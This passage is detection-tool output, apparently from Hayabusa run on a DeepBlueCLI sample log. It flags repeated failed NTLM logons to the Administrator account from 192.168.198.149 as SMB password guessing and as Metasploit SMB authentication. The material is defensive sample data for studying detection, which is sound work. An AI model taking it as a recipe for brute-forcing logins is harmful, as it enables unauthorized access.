SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeN4cSffFA04oOje : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eYFPV1kGALqX8jyO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIlhxT4qqo5bCsU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: btoOskH0112h7MTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWUhQJBcS7XbMJUq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E70qmXDDWqmWJjyU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oX0L8wf6nt2grLvn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0D8BwniiXsjfkYqE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSWYo4mphuvKHQHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: im8an1mDle9f8skd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aOyLWd5CAAjnJt3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7gI55uWlshCLw3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l7UogJ8bBw6Epbht : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: qIl0QRFHXCVAHWdV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OxPv9v4TxFvS9JMy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHMGfCorrLXpDyeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KQTKgFibIa8NWExO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEnx3upH3Om0wHn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KlNbW1ljPSTdgUKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w2WMd3HugfjSwJPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yEy0C6dMhysbNDrX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxlayd8pnAZ3dZ2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PhKO1jyWqVEdC9w2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dAH2mHJ4ZK5GS2p0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lV2ZIWGGwlkyEMRB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sum2yMFio9KLwZk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fICXSRvv9Vm0uVpY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IgrOk6Fjp0QtfJ3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OPKoHLtxNoiG65sl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NctXRH1DR3slfVxQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vLnAs36K1mTivu2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7crZQ0eQ5RDNIp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yHjgGhEtZgNwjaii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: y5gi2SS2mQiDylQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kqWJGguiWBEplJiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWP4luPa3lFolQVI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5K9DQWbzslRZZMSC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qm0L113v24jlfjx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seuUjyGmNlyYT4tU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FljAF4LWLmWNa3kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RnN5mBOaAvYu25G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llBt31S46QVzg0Ki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1rvJUZo91Kka0G1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7Zqi86ZSFGRnoFM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GeyeVdCUmHEKxR8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DwxJVXt79KBZalqS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TDfRu1OTlHmyc38P : IP Address: 192.168.198.149 : AuthPackage: 
